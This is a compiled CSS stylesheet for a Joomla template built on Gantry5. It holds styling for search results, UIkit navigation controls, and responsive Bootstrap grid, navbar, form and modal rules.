.search .search-add-options > fieldset:first-child {
  margin-right: 50px;
}
@media only all and (max-width: 47.938rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  .search .search-add-options > fieldset:first-child {
    margin-bottom: 50px;
  }
}
/* line 76, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 77, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item {
  padding: 40px 0 40px 50px;
  border-top: 1px solid #ddd;
  position: relative;
}
/* line 81, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .item-number {
  position: absolute;
  left: 0;
  border: 1px solid #ddd;
  text-align: center;
  width: 30px;
  height: 30px;
  line-height: 30px;
  border-radius: 0;
}
/* line 91, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title {
  line-height: 30px;
}
/* line 93, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
/* line 94, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title h4 a {
  color: #282828;
}
/* line 96, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .result-title h4 a:hover {
  color: #4f953b;
}
/* line 102, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item dd {
  margin: 0;
}
/* line 105, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info {
  margin-top: 20px;
}
/* line 107, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info dd {
  display: inline-block;
  margin-right: 20px;
}
/* line 110, templates/it_sanctum/scss/sanctum-joomla/_search.scss */
.search .search-results .result-item .search-item-info dd i {
  margin-right: 7px;
}
/* line 1, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 3, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 4, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-dotnav > * > *, .uk-dotnav-contrast > * > * {
  border-radius: 0px !important;
  background: rgba(0, 0, 0, 0.1) !important;
}
/* line 9, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 10, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-dotnav > .uk-active > *, .uk-dotnav-contrast > .uk-active > * {
  background: rgba(0, 0, 0, 0.2) !important;
}
/* line 16, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 17, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 18, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.g-container .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 24, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.g-container .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
/* line 31, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 32, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
/* line 33, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-modal .uk-slidenav-position .uk-slidenav {
  border-radius: 0;
  background: transparent;
  font-size: 50px;
  color: rgba(0, 0, 0, 0.3);
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
/* line 39, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-modal .uk-slidenav-position .uk-slidenav:hover {
  color: #4f953b;
}
/* line 46, templates/it_sanctum/scss/sanctum-joomla/_uikit.scss */
.uk-grid-divider > * {
  padding-left: 35px !important;
  margin-bottom: 20px !important;
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top, .navbar-fixed-bottom, .navbar-static-top {
    margin-right: -20px;
    margin-left: -20px;
  }
  /* line 8, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .container-fluid {
    padding: 0;
  }
  /* line 11, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .dl-horizontal dt {
    float: none;
    width: auto;
    clear: none;
    text-align: left;
  }
  /* line 17, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .dl-horizontal dd {
    margin-left: 0;
  }
  /* line 20, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid {
    width: 100%;
  }
  /* line 23, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row, .thumbnails {
    margin-left: 0;
  }
  /* line 27, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .thumbnails > li {
    float: none;
    margin-left: 0;
  }
  /* line 32, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .manager.thumbnails > li {
    float: left;
    margin-left: 20px;
  }
  /* line 37, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  [class*="span"], .uneditable-input[class*="span"], .row-fluid [class*="span"] {
    display: block;
    float: none;
    width: 100%;
    margin-left: 0;
    box-sizing: border-box;
  }
  /* line 46, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span12, .row-fluid .span12 {
    width: 100%;
    box-sizing: border-box;
  }
  /* line 51, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="offset"]:first-child {
    margin-left: 0;
  }
  /* line 54, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .input-large, .input-xlarge, .input-xxlarge, input[class*="span"], select[class*="span"], textarea[class*="span"], .uneditable-input {
    display: block;
    width: 100%;
    min-height: 30px;
    box-sizing: border-box;
  }
  /* line 66, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .input-prepend input, .input-append input, .input-prepend input[class*="span"], .input-append input[class*="span"] {
    display: inline-block;
    width: auto;
  }
  /* line 73, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 0;
  }
}
@media only all and (max-width: 30rem) {
  /* line 79, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse {
    -webkit-transform: translate3d(0, 0, 0);
  }
  /* line 82, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .page-header h1 small {
    display: block;
    line-height: 20px;
  }
  /* line 86, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .control-label {
    float: none;
    width: auto;
    padding-top: 0;
    text-align: left;
  }
  /* line 92, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .controls {
    margin-left: 0;
  }
  /* line 95, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .control-list {
    padding-top: 0;
  }
  /* line 98, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .form-horizontal .form-actions {
    padding-right: 10px;
    padding-left: 10px;
  }
  /* line 102, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .media .pull-left, .media .pull-right {
    display: block;
    float: none;
    margin-bottom: 10px;
  }
  /* line 108, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .media-object {
    margin-right: 0;
    margin-left: 0;
  }
  /* line 112, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .modal-header .close {
    padding: 10px;
    margin: -10px;
  }
}
@media only all and (min-width: 48rem) and (max-width: 59.938rem) {
  /* line 119, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row {
    margin-left: -20px;
  }
  /* line 122, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row:before, .row:after {
    display: table;
    line-height: 0;
    content: "";
  }
  /* line 128, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row:after {
    clear: both;
  }
  /* line 131, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  [class*="span"] {
    float: left;
    min-height: 1px;
    margin-left: 20px;
  }
  /* line 136, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span12 {
    width: 724px;
  }
  /* line 139, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span11 {
    width: 662px;
  }
  /* line 142, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span10 {
    width: 600px;
  }
  /* line 145, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span9 {
    width: 538px;
  }
  /* line 148, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span8 {
    width: 476px;
  }
  /* line 151, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span7 {
    width: 414px;
  }
  /* line 154, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span6 {
    width: 352px;
  }
  /* line 157, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span5 {
    width: 290px;
  }
  /* line 160, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span4 {
    width: 228px;
  }
  /* line 163, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span3 {
    width: 166px;
  }
  /* line 166, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span2 {
    width: 104px;
  }
  /* line 169, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .span1 {
    width: 42px;
  }
  /* line 172, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset12 {
    margin-left: 764px;
  }
  /* line 175, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset11 {
    margin-left: 702px;
  }
  /* line 178, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset10 {
    margin-left: 640px;
  }
  /* line 181, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset9 {
    margin-left: 578px;
  }
  /* line 184, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset8 {
    margin-left: 516px;
  }
  /* line 187, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset7 {
    margin-left: 454px;
  }
  /* line 190, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset6 {
    margin-left: 392px;
  }
  /* line 193, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset5 {
    margin-left: 330px;
  }
  /* line 196, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset4 {
    margin-left: 268px;
  }
  /* line 199, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset3 {
    margin-left: 206px;
  }
  /* line 202, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset2 {
    margin-left: 144px;
  }
  /* line 205, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .offset1 {
    margin-left: 82px;
  }
  /* line 208, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid {
    width: 100%;
  }
  /* line 211, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid:before, .row-fluid:after {
    display: table;
    line-height: 0;
    content: "";
  }
  /* line 217, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid:after {
    clear: both;
  }
  /* line 220, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="span"] {
    display: block;
    float: left;
    width: 100%;
    min-height: 30px;
    margin-left: 2.7624309392%;
    box-sizing: border-box;
  }
  /* line 228, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid [class*="span"]:first-child {
    margin-left: 0;
  }
  /* line 231, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .controls-row [class*="span"] + [class*="span"] {
    margin-left: 2.7624309392%;
  }
  /* line 234, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span12 {
    width: 100%;
  }
  /* line 237, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span11 {
    width: 91.4364640884%;
  }
  /* line 240, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span10 {
    width: 82.8729281768%;
  }
  /* line 243, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span9 {
    width: 74.3093922652%;
  }
  /* line 246, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span8 {
    width: 65.7458563536%;
  }
  /* line 249, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span7 {
    width: 57.182320442%;
  }
  /* line 252, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span6 {
    width: 48.6187845304%;
  }
  /* line 255, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span5 {
    width: 40.0552486188%;
  }
  /* line 258, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span4 {
    width: 31.4917127072%;
  }
  /* line 261, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span3 {
    width: 22.9281767956%;
  }
  /* line 264, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span2 {
    width: 14.364640884%;
  }
  /* line 267, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .span1 {
    width: 5.8011049724%;
  }
  /* line 270, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset12 {
    margin-left: 105.5248618785%;
  }
  /* line 273, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset12:first-child {
    margin-left: 102.7624309392%;
  }
  /* line 276, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset11 {
    margin-left: 96.9613259669%;
  }
  /* line 279, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset11:first-child {
    margin-left: 94.1988950276%;
  }
  /* line 282, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset10 {
    margin-left: 88.3977900552%;
  }
  /* line 285, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset10:first-child {
    margin-left: 85.635359116%;
  }
  /* line 288, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset9 {
    margin-left: 79.8342541436%;
  }
  /* line 291, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset9:first-child {
    margin-left: 77.0718232044%;
  }
  /* line 294, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset8 {
    margin-left: 71.270718232%;
  }
  /* line 297, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset8:first-child {
    margin-left: 68.5082872928%;
  }
  /* line 300, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset7 {
    margin-left: 62.7071823204%;
  }
  /* line 303, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset7:first-child {
    margin-left: 59.9447513812%;
  }
  /* line 306, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset6 {
    margin-left: 54.1436464088%;
  }
  /* line 309, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset6:first-child {
    margin-left: 51.3812154696%;
  }
  /* line 312, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset5 {
    margin-left: 45.5801104972%;
  }
  /* line 315, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset5:first-child {
    margin-left: 42.817679558%;
  }
  /* line 318, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset4 {
    margin-left: 37.0165745856%;
  }
  /* line 321, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset4:first-child {
    margin-left: 34.2541436464%;
  }
  /* line 324, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset3 {
    margin-left: 28.453038674%;
  }
  /* line 327, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset3:first-child {
    margin-left: 25.6906077348%;
  }
  /* line 330, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset2 {
    margin-left: 19.8895027624%;
  }
  /* line 333, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset2:first-child {
    margin-left: 17.1270718232%;
  }
  /* line 336, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset1 {
    margin-left: 11.3259668508%;
  }
  /* line 339, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .row-fluid .offset1:first-child {
    margin-left: 8.5635359116%;
  }
  /* line 342, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input, textarea, .uneditable-input {
    margin-left: 0;
  }
  /* line 347, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .controls-row [class*="span"] + [class*="span"] {
    margin-left: 20px;
  }
  /* line 350, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span12, textarea.span12, .uneditable-input.span12 {
    width: 710px;
  }
  /* line 355, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span11, textarea.span11, .uneditable-input.span11 {
    width: 648px;
  }
  /* line 360, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span10, textarea.span10, .uneditable-input.span10 {
    width: 586px;
  }
  /* line 365, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span9, textarea.span9, .uneditable-input.span9 {
    width: 524px;
  }
  /* line 370, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span8, textarea.span8, .uneditable-input.span8 {
    width: 462px;
  }
  /* line 375, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span7, textarea.span7, .uneditable-input.span7 {
    width: 400px;
  }
  /* line 380, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span6, textarea.span6, .uneditable-input.span6 {
    width: 338px;
  }
  /* line 385, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span5, textarea.span5, .uneditable-input.span5 {
    width: 276px;
  }
  /* line 390, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span4, textarea.span4, .uneditable-input.span4 {
    width: 214px;
  }
  /* line 395, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span3, textarea.span3, .uneditable-input.span3 {
    width: 152px;
  }
  /* line 400, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span2, textarea.span2, .uneditable-input.span2 {
    width: 90px;
  }
  /* line 405, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  input.span1, textarea.span1, .uneditable-input.span1 {
    width: 28px;
  }
}
@media only all and (max-width: 59.938rem) {
  /* line 413, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top, .navbar-fixed-bottom {
    position: static;
  }
  /* line 417, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top {
    margin-bottom: 20px;
  }
  /* line 420, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-bottom {
    margin-top: 20px;
  }
  /* line 423, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-fixed-top .navbar-inner, .navbar-fixed-bottom .navbar-inner {
    padding: 5px;
  }
  /* line 427, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .container {
    width: auto;
    padding: 0;
  }
  /* line 431, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .brand {
    padding-right: 10px;
    padding-left: 10px;
    margin: 0 0 0 -5px;
  }
  /* line 436, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse {
    clear: both;
  }
  /* line 439, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav {
    float: none;
    margin: 0 0 10px;
  }
  /* line 443, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li {
    float: none;
  }
  /* line 446, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a {
    margin-bottom: 2px;
  }
  /* line 449, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > .divider-vertical {
    display: none;
  }
  /* line 452, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav .nav-header {
    color: #777;
    text-shadow: none;
  }
  /* line 456, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a, .nav-collapse .dropdown-menu a {
    padding: 9px 15px;
    font-weight: bold;
    color: #777;
    border-radius: 0.1875rem;
  }
  /* line 463, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .btn {
    padding: 4px 10px 4px;
    font-weight: normal;
    border-radius: 0.1875rem;
  }
  /* line 468, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu li + li a {
    margin-bottom: 2px;
  }
  /* line 471, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > a:hover, .nav-collapse .nav > li > a:focus, .nav-collapse .dropdown-menu a:hover, .nav-collapse .dropdown-menu a:focus {
    background-color: #f2f2f2;
  }
  /* line 477, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .nav > li > a, .navbar-inverse .nav-collapse .dropdown-menu a {
    color: #999;
  }
  /* line 481, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .nav > li > a:hover, .navbar-inverse .nav-collapse .nav > li > a:focus, .navbar-inverse .nav-collapse .dropdown-menu a:hover, .navbar-inverse .nav-collapse .dropdown-menu a:focus {
    background-color: #111;
  }
  /* line 487, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse.in .btn-group {
    padding: 0;
    margin-top: 5px;
  }
  /* line 491, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu {
    position: static;
    top: auto;
    left: auto;
    display: none;
    float: none;
    max-width: none;
    padding: 0;
    margin: 0 15px;
    background-color: transparent;
    border: none;
    border-radius: 0;
    box-shadow: none;
  }
  /* line 505, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .open > .dropdown-menu {
    display: block;
  }
  /* line 508, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu:before, .nav-collapse .dropdown-menu:after {
    display: none;
  }
  /* line 512, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .dropdown-menu .divider {
    display: none;
  }
  /* line 515, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .nav > li > .dropdown-menu:before, .nav-collapse .nav > li > .dropdown-menu:after {
    display: none;
  }
  /* line 519, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse .navbar-form, .nav-collapse .navbar-search {
    float: none;
    padding: 10px 15px;
    margin: 10px 0;
    border-top: 1px solid #f2f2f2;
    border-bottom: 1px solid #f2f2f2;
    box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  }
  /* line 528, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-inverse .nav-collapse .navbar-form, .navbar-inverse .nav-collapse .navbar-search {
    border-top-color: #111;
    border-bottom-color: #111;
  }
  /* line 533, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .nav-collapse .nav.pull-right {
    float: none;
    margin-left: 0;
  }
  /* line 537, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse, .nav-collapse.collapse {
    height: 0;
    overflow: hidden;
  }
  /* line 542, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar .btn-navbar {
    display: block;
  }
  /* line 545, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .navbar-static .navbar-inner {
    padding-right: 10px;
    padding-left: 10px;
  }
}
@media only all and (min-width: 60rem) {
  /* line 552, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_bootstrap.scss */
  .nav-collapse.collapse {
    height: auto !important;
    overflow: visible !important;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  /* line 3, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  .form-horizontal .control-label {
    display: block;
    float: none;
    text-align: left;
  }
  /* line 9, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  .form-horizontal .controls {
    margin: 0;
  }
  /* line 14, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_forms.scss */
  [dir="rtl"] .form-horizontal .control-label {
    text-align: right;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 2, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal {
    position: fixed;
    top: 20px;
    right: 20px;
    left: 20px;
    width: auto;
    margin: 0;
  }
  /* line 10, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal.fade {
    top: -100px;
  }
  /* line 13, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal.fade.in {
    top: 20px;
  }
}
@media only all and (max-width: 30rem) {
  /* line 19, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  div.modal {
    top: 10px;
    right: 10px;
    left: 10px;
  }
}
@media only all and (max-width: 47.938rem) {
  /* line 27, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  /* line 28, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  .pull-right.item-image {
    margin-left: 0;
  }
  /* line 33, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  /* line 34, media/gantry5/engines/nucleus/scss/joomla/theme/breakpoints/_utilities.scss */
  .pull-left.item-image {
    margin-right: 0;
  }
}
